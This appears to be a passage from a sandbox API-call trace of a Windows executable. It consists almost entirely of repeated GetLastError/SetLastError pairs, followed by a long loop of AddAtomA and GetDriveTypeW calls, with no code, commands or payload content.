(dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.095] GetLastError () returned 0x0 [0096.095] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.096] SetLastError (dwErrCode=0x0) [0096.096] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.097] SetLastError (dwErrCode=0x0) [0096.097] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.098] SetLastError (dwErrCode=0x0) [0096.098] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.099] SetLastError (dwErrCode=0x0) [0096.099] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.100] SetLastError (dwErrCode=0x0) [0096.100] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.101] SetLastError (dwErrCode=0x0) [0096.101] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.102] SetLastError (dwErrCode=0x0) [0096.102] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.103] SetLastError (dwErrCode=0x0) [0096.103] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.108] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0096.108] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0096.109] GetLastError () returned 0x0 [0096.109] SetLastError (dwErrCode=0x0) [0096.109] GetLastError () returned 0x0 [0096.109] SetLastError (dwErrCode=0x0) [0096.109] GetLastError () returned 0x0 [0096.109] SetLastError (dwErrCode=0x0) [0096.109] GetLastError () returned 0x0 [0096.109] SetLastError (dwErrCode=0x0) [0096.110] AddAtomA (lpString=0x0) returned 0x0 [0096.110] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA 